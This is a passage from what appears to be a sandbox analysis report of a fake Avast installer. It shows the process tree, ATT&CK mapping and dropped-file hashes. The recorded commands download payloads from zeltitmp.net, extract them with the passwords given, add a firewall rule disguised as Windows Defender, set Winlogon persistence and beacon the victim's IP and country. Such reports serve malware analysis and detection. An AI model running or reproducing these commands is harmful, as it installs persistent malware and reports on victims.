    powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', 'C:\Windows\System32\curl.exe')"
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl https://ipinfo.io/ip -k
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\system32\curl.exe
      curl https://ipinfo.io/ip -k
      4⤵
      Executes dropped EXE
      PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl https://ipinfo.io/country -k
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\system32\curl.exe
      curl https://ipinfo.io/country -k
      4⤵
      Executes dropped EXE
      PID:2648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 7" 1>nul )"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4296
  - - C:\Windows\system32\findstr.exe
      findstr /ilc:"Windows 7"
      4⤵
      PID:4068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get caption
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 8" 1>nul )"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\system32\findstr.exe
      findstr /ilc:"Windows 8"
      4⤵
      PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get caption
    3⤵
    PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 8.1" 1>nul )"
    3⤵
    PID:2288
  - - C:\Windows\system32\findstr.exe
      findstr /ilc:"Windows 8.1"
      4⤵
      PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get caption
    3⤵
    PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 10" 1>nul )"
    3⤵
    PID:4936
  - - C:\Windows\system32\findstr.exe
      findstr /ilc:"Windows 10"
      4⤵
      PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get caption
    3⤵
    PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ( findstr /ilc:"Windows 11" 1>nul )"
    3⤵
    PID:4448
  - - C:\Windows\system32\findstr.exe
      findstr /ilc:"Windows 11"
      4⤵
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
    3⤵
    PID:1800
  - - C:\Windows\system32\curl.exe
      curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
      4⤵
      Executes dropped EXE
      PID:2112
- - C:\Windows\system32\curl.exe
    curl -k -o "C:\Users\Admin\AppData\Local\Temp\cc.7z" -L "https://zeltitmp.net/pp/cc.7z" --user-agent "cnfvp201"
    3⤵
    - Executes dropped EXE
    PID:4532
- - C:\Program Files (x86)\7-Zip\7z.exe
    "C:\Program Files (x86)\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\cc.7z" -o"C:\Users\Admin\AppData\Local\Temp" -pconfigvpnG2012885838482012ggg -y
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell C:\Users\Admin\AppData\Local\Temp\cc.bat
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cc.bat""
      4⤵
      PID:216
    - - C:\Windows\system32\curl.exe
        
        curl -k -o "C:\Users\Admin\AppData\Local\Temp\NetFramework.4.0.7z" -L -C - "https://zeltitmp.net/pp/NetFramework.4.0.7z" --user-agent "cnfvp201" --retry 3
        5⤵
        Executes dropped EXE
        
        PID:1428
    - - C:\Program Files (x86)\7-Zip\7z.exe
        
        "C:\Program Files (x86)\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\NetFramework.4.0.7z" -o"C:\Windows" -pGkjkjg7655ngdfJckjhfjhd789gdfhDGDFsfdgfd -y
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:2284
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Mail_Sender
        5⤵
        Views/modifies file attributes
        
        PID:5776
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Windows Defender" dir=in action=allow program="C:\Windows\Windows Driver Foundation (WDF).exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5788
    - - C:\Windows\system32\reg.exe
        
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,cmd /C \"start \"\" \"C:\Windows\Windows Driver Foundation (WDF).exe\" \"" /f
        5⤵
        Modifies WinLogon for persistence
        
        PID:5944
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:6092
    - - C:\Windows\Windows Driver Foundation (WDF).exe
        
        "C:\Windows\Windows Driver Foundation (WDF).exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5140
      - C:\Windows\Local.exe
        
        C:\Windows\Local.exe
        6⤵
        Executes dropped EXE
        
        PID:5668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get ProcessorID
        7⤵
        
        PID:3216
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        7⤵
        
        PID:5480
        
        C:\Windows\system32\CMD.exe
        
        CMD /C "WMIC DISKDRIVE GET SERIALNUMBER"
        7⤵
        
        PID:5168
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC DISKDRIVE GET SERIALNUMBER
        8⤵
        
        PID:5940
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Local.exe /f
        6⤵
        Kills process with taskkill
        
        PID:5448
      - C:\Windows\SysWOW64\Wbem\wmic.exe
        
        wmic csproduct get UUID
        6⤵
        
        PID:64
    - - C:\Windows\system32\curl.exe
        
        curl -k -L "https://zeltitmp.net/pp/cu/cu.php?ip=154.61.71.13&vos=10&cid=NL&sid=ava2&pid=p2&s=1" --user-agent "cnfvp201"
        5⤵
        Executes dropped EXE
        
        PID:5196

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4940
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.0.180614591\1120672761" -parentBuildID 20221007134813 -prefsHandle 1696 -prefMapHandle 1688 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af2f6761-2efb-44d5-8e9e-c67122ecf94b} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1776 1f5381e5c58 gpu
    3⤵
    PID:5000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.1.1279585848\752964603" -parentBuildID 20221007134813 -prefsHandle 2112 -prefMapHandle 2108 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3eb6a05-dc5c-4158-94e3-b3a824b28caa} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 2132 1f5381e3858 socket
    3⤵
    PID:3416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.2.1844439208\1186851860" -childID 1 -isForBrowser -prefsHandle 2624 -prefMapHandle 2616 -prefsLen 21055 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7be521bc-f6ac-4144-8556-48647a5280c0} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 2832 1f53c0fd658 tab
    3⤵
    PID:4052
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.3.2043965284\1539784768" -childID 2 -isForBrowser -prefsHandle 3468 -prefMapHandle 3464 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6efe28c8-2b60-48ed-8967-143764098086} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 3492 1f53ac6ab58 tab
    3⤵
    PID:3732
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.4.778391861\356386366" -childID 3 -isForBrowser -prefsHandle 4248 -prefMapHandle 4232 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0deae304-1df1-4e0c-bcd7-bafbbdf9191e} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 4260 1f53e3e9e58 tab
    3⤵
    PID:4472
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.5.732590088\1299197989" -childID 4 -isForBrowser -prefsHandle 4740 -prefMapHandle 4736 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e54cba2-58b5-4773-a971-ac294fe462ed} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 4728 1f53ed72858 tab
    3⤵
    PID:64
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.7.4874237\2029863127" -childID 6 -isForBrowser -prefsHandle 5064 -prefMapHandle 5068 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1cee91d-5215-4d65-8f56-90e849328353} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 4968 1f53edfb958 tab
    3⤵
    PID:1192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.6.1200322653\1029412738" -childID 5 -isForBrowser -prefsHandle 4872 -prefMapHandle 4876 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85739cbb-5cc4-4674-b7f9-8502ea0a8e33} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 4956 1f53edfcb58 tab
    3⤵
    PID:4324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.8.1074628018\1704538367" -childID 7 -isForBrowser -prefsHandle 5576 -prefMapHandle 5572 -prefsLen 26795 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb27bc1d-7a1d-405a-b834-073867c118e7} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 5584 1f540c8ba58 tab
    3⤵
    PID:5136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.9.689834599\643947370" -childID 8 -isForBrowser -prefsHandle 5748 -prefMapHandle 5612 -prefsLen 26795 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5382a44-f1a7-4a11-85d9-201c175ab671} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 4832 1f539b9d258 tab
    3⤵
    PID:4200
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.11.766794495\76962610" -childID 10 -isForBrowser -prefsHandle 9372 -prefMapHandle 9376 -prefsLen 26795 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7427757b-d4c9-43ff-9d32-cef74243ab68} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 9364 1f5413ddf58 tab
    3⤵
    PID:5856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.10.936836565\702432332" -childID 9 -isForBrowser -prefsHandle 9616 -prefMapHandle 9752 -prefsLen 26795 -prefMapSize 232675 -jsInitHandle 1184 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7129e925-6d38-4044-825b-8fb8e93cec18} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 9628 1f5413dd958 tab
    3⤵
    PID:5916
- - C:\Users\Admin\Downloads\avast_premium_security_setup_offline.exe
    "C:\Users\Admin\Downloads\avast_premium_security_setup_offline.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\7-Zip\7z.dll

Filesize
1.2MB

MD5
a65e53c974a4e61728ecb632339a0978

SHA1
27e6ec4f8e34b40f1e08503245700c182b918ce9

SHA256
ca8ab5aeef734f24a3c58bf10b3f0152c2ea1329b02d2730448693df563b4c6a

SHA512
b029962f08867496cd3fd5e9af4b0703dae918e938aee759aeffbb4184ea6d3e81e0878ba8957e80d30db5d7b6fc8598e68918a4d16b3d010f31a2e16417593e

Download Submit
C:\Program Files (x86)\7-Zip\7z.exe

Filesize
329KB

MD5
62d2156e3ca8387964f7aa13dd1ccd5b

SHA1
a5067e046ed9ea5512c94d1d17c394d6cf89ccca

SHA256
59cbfba941d3ac0238219daa11c93969489b40f1e8b38fabdb5805ac3dd72bfa

SHA512
006f7c46021f339b6cbf9f0b80cffa74abb8d48e12986266d069738c4e6bdb799bfba4b8ee4565a01e90dbe679a96a2399d795a6ead6eacbb4818a155858bf60

Download Submit
C:\Program Files (x86)\7-Zip\7z.exe

Filesize
329KB

MD5
62d2156e3ca8387964f7aa13dd1ccd5b

SHA1
a5067e046ed9ea5512c94d1d17c394d6cf89ccca

SHA256
59cbfba941d3ac0238219daa11c93969489b40f1e8b38fabdb5805ac3dd72bfa

SHA512
006f7c46021f339b6cbf9f0b80cffa74abb8d48e12986266d069738c4e6bdb799bfba4b8ee4565a01e90dbe679a96a2399d795a6ead6eacbb4818a155858bf60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fd6c451f0ad4c6a2abf4a28c008154a8

SHA1
d9801126f75999cc3a7b422254f40df7e051afe6

SHA256
b2bb1b0b1ed10c633c21512c0e10a0cc787070c0f70f192b9da437b15b94d8d5

SHA512
70d2e9933a5a1e8fb6e12e887bb0c2da439a038b5fe070c9b3d61e6a07b1f74af015be61d07035e98c7d3fad8080530309a647decaf04206af69729ccc558159

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lbui68z9.default-release\activity-stream.discovery_stream.json.tmp

Filesize
163KB

MD5
b2ebda791073ca669f559e74046065c3

SHA1
1bb7ac3580ac4bf1ee31122c0e97191c2473fd65

SHA256
3305ac1788ff3c5d44efb61e27a2b3fe6be35d84b72d8c99ed36d36b27a8923a

SHA512
24dfacb9d19d653a8e7bf2bd8121a525b9fd5b2dcfc6863c7096e731d898d3f2260e9d7173adcb4b17af732ac08dd893466fd9d8a86007701223b7506c219249

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lbui68z9.default-release\cache2\doomed\12955

Filesize
15KB

MD5
a87a1cbecbc2c7252ea86121586b2c24

SHA1
991a03bb61eee8b838eea3df1efd8b0c376eb304

SHA256
ec14f6e266e3af4a72080dd87a4ac97f4a1c255afb66c35d951f10fa9bd68888

SHA512
c2694f3622a70e40b2864de75834c8cfbf4fde9ed186db49608496801cac33007e61e3d6f90e3deb3feea0183eeee4cd5200df104865ce4dd694801f73bc7893

Download Submit
C:\Users\Admin\AppData\Local\Temp\4F6BT1QN.bat

Filesize
52KB

MD5
a3b4408a58b7ca2a90f951d908f03fd5

SHA1
70ae2314220e4d5eb1d78ed88f24d9a36016db36

SHA256
5ad7b49ee56056675688be7e7139785a91d7d0cc3641035b2b76eebf08068731

SHA512
8afd5a657b482cb2a8f197407d1ed2e326bdd9426ac2815efd75a19f99c6e714db29b9ade7ce457aee613bac28fe7ae10ade508a2c0d72bc8a69f27bf1168f8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\NetFramework.4.0.7z

Filesize
14.8MB

MD5
c20488cedbac0f9099ffb33ba0bb1896

SHA1
3ab9d461ad2a4a32ea3f531032fb70784100766b

SHA256
809f4c56a24d18e3f4313a0e967530a368b3f243da89dd5eaa5ada59752704ff

SHA512
9e44df7c35bb4525c2337c1bc3e28e941cd669f6f1182e3c9859c6d637e470f9e1903a2e2e56b725d5565adceea8838eef37bd2d9b9ef86bf796959bc39bb8a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3yeioui.t5m.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cc.7z

Filesize
2KB

MD5
e3c9599dd8aefb94b3a02f478f2cdee0

SHA1
0dc84d757050984dd9bb09ad22dd4058460b9c7b

SHA256
04b9559104dea95c0e66ca393b2c1db38b96b08e2857a9a37f92a2f62a8e258d

SHA512
7980bad46ac7ad33c1235be98488320803ad99dfb1ddeab0e6bf1e246982d0a5cc745a04cc96befd88fc43413ae96f6498e229417dd55d4ac765e8792a53dd38

Download Submit
C:\Users\Admin\AppData\Local\Temp\cc.bat

Filesize
16KB

MD5
63a4360e7b79a7c3e51088105cb9e4a4

SHA1
5872c5cc7f76ad1147043734951b2cfe4b5fb60b

SHA256
5d8bef51538f059808727b94afe94a531baca13f2150a93299c926c883574960

SHA512
e813dabb933004d604cfbb1772ce8197b2482fee8eed3af1a303937ae4d263bc0cd38946197c2f2411cf02a52f4edb964eef9f7d1fd85927c3666e943e750f58

Download Submit
C:\Users\Admin\AppData\Local\Temp\cnf

Filesize
48B

MD5
3cf0fb237d897b954ff7fb64b28f30c7

SHA1
013a8e8d06be35cec8bef4887a4f0af675a62cdb

SHA256
295b8dd0c847ea6346321aa6a047a168ba7039d88360dbb8d575bcb18c803b3a

SHA512
bb6cf3c98e9979cdf2cd535ed024c591e7110b0dccb63e240c7d14b418ca94d4cdaf5a94eaf7cd8e20196ecb10314baad2bd0683acbb85e4867f6a5f33f36eba

Download Submit
C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\7z2201.exe

Filesize
1.2MB

MD5
734e95cdbe04f53fe7c28eeaaaad7327

SHA1
e49a4d750f83bc81d79f1c4c3f3648a817c7d3da

SHA256
8c8fbcf80f0484b48a07bd20e512b103969992dbf81b6588832b08205e3a1b43

SHA512
16b02001c35248f18095ba341b08523db327d7aa93a55bcee95aebb22235a71eae21a5a8d19019b10cac3e7764a59d78cf730110bae80acc2ff249bbc7861ad7

Download Submit
C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\7z2201.exe

Filesize
1.2MB

MD5
734e95cdbe04f53fe7c28eeaaaad7327

SHA1
e49a4d750f83bc81d79f1c4c3f3648a817c7d3da

SHA256
8c8fbcf80f0484b48a07bd20e512b103969992dbf81b6588832b08205e3a1b43

SHA512
16b02001c35248f18095ba341b08523db327d7aa93a55bcee95aebb22235a71eae21a5a8d19019b10cac3e7764a59d78cf730110bae80acc2ff249bbc7861ad7

Download Submit
C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\act01.7z

Filesize
7KB

MD5
4225e8b72fd7e42d261f0f0ee724c643

SHA1
2e0d13d5737c05b0257b847e579a190eccf65b21

SHA256
9916fcf8827a3a4fa02ab764ce7c29f49105075dd81b621f03b086b8543fd197

SHA512
4518a45493488608db7f9332044f61fddc1e06dbc3d4c206e54c37128be8db6c9a75b5d34a043fe27dcb68081e37fe916c24785e181cf7abc5ccbee7ed1b06f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\cnf

Filesize
48B

MD5
3cf0fb237d897b954ff7fb64b28f30c7

SHA1
013a8e8d06be35cec8bef4887a4f0af675a62cdb

SHA256
295b8dd0c847ea6346321aa6a047a168ba7039d88360dbb8d575bcb18c803b3a

SHA512
bb6cf3c98e9979cdf2cd535ed024c591e7110b0dccb63e240c7d14b418ca94d4cdaf5a94eaf7cd8e20196ecb10314baad2bd0683acbb85e4867f6a5f33f36eba

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\prefs-1.js

Filesize
6KB

MD5
229853de4bb8d4a0dbb30619b8ba9e10

SHA1
9a7505c5ef6dfe30eced46b6cde4cd075f0086c4

SHA256
6690b6e1b252fe3ba2680f2760f902eec5ee8b983244dcd241a1eb2e17e5065a

SHA512
8da8a05194cbc96fa0e7fb65173cd591f6e487dd2dd5c3e020d5b628de64ff14f4aa5df820fb3bcefeff11e9e84aea3d12ad0e3aa92976366f8b29602a12b2c8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\prefs-1.js

Filesize
7KB

MD5
cb3c8b79f961a1a4682bb62ab2c4ffe7

SHA1
134abf6014fce05755fd6120484182873a4713a1

SHA256
32562c5e7df276ed2cb712fa6ce89b064f2500617d98301c0f26d7e2f3b53dad

SHA512
6f930cf3fffe780bbc97c310c7d51b574283d6e701b94e764d2aefb1e553c1c38b0e60c1abd0793d97e2d45244f68fa54a3cbff934dc0e907bb2b686ed6b3c69

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lbui68z9.default-release\prefs-1.js

Filesize
7KB

MD5
167d56982cd444f92887f88d675bc334

SHA1
